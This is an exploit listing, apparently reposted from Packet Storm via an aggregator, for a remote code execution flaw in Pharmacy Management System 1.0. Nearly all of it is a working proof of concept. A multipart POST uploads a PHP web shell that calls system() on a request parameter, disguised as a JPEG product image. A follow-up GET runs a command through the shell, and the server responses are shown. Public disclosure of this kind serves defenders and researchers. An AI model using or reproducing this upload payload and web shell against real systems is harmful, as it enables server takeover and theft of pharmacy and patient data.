Exploit for Pharmacy Management System 1.0 Shell Upload

Name: Exploit for Pharmacy Management System 1.0 Shell Upload
Rating: 5 (233 reviews)
2022-04-20 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:166786
# Exploit Title: Pharmacy management system - Remote Code Execution (RCE)  
# Date: 19/04/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Contact: https://twitter.com/dmaral3noz  
  
# Exploit :   
  
You can upload a php shell file as a productImage  
  
# ------------------------------------------------------------------------------------------  
# POC  
# ------------------------------------------------------------------------------------------  
  
# Request sent as base user  
  
POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631  
Content-Length: 559  
Connection: close  
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel  
Upgrade-Insecure-Requests: 1  
  
-----------------------------208935235035266125502673738631  
Content-Disposition: form-data; name="old_image"  
  
  
-----------------------------208935235035266125502673738631  
Content-Disposition: form-data; name="productImage"; filename="shell.php"  
Content-Type: image/jpeg  
  
<?php  
if($_REQUEST['s']) {  
system($_REQUEST['s']);  
} else phpinfo();  
?>  
</pre>  
</body>  
</html>  
-----------------------------208935235035266125502673738631  
Content-Disposition: form-data; name="btn"  
  
  
-----------------------------208935235035266125502673738631--  
  
  
  
  
# Response  
  
HTTP/1.1 302 Found  
Date: Tue, 19 Apr 2022 20:43:17 GMT  
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1  
X-Powered-By: PHP/8.1.2  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
location: ../product.php  
Content-Length: 77  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
Image uploaded successfully{"success":true,"messages":"Successfully Updated"}  
  
  
  
# ------------------------------------------------------------------------------------------  
# Request to webshell  
# ------------------------------------------------------------------------------------------  
  
GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: image/webp,*/*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel  
  
  
  
# ------------------------------------------------------------------------------------------  
# Webshell response  
# ------------------------------------------------------------------------------------------  
  
  
HTTP/1.1 200 OK  
Date: Tue, 19 Apr 2022 20:55:58 GMT  
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1  
X-Powered-By: PHP/8.1.2  
Content-Length: 33  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
  
0xSaudi  
</pre>  
</body>  
</html>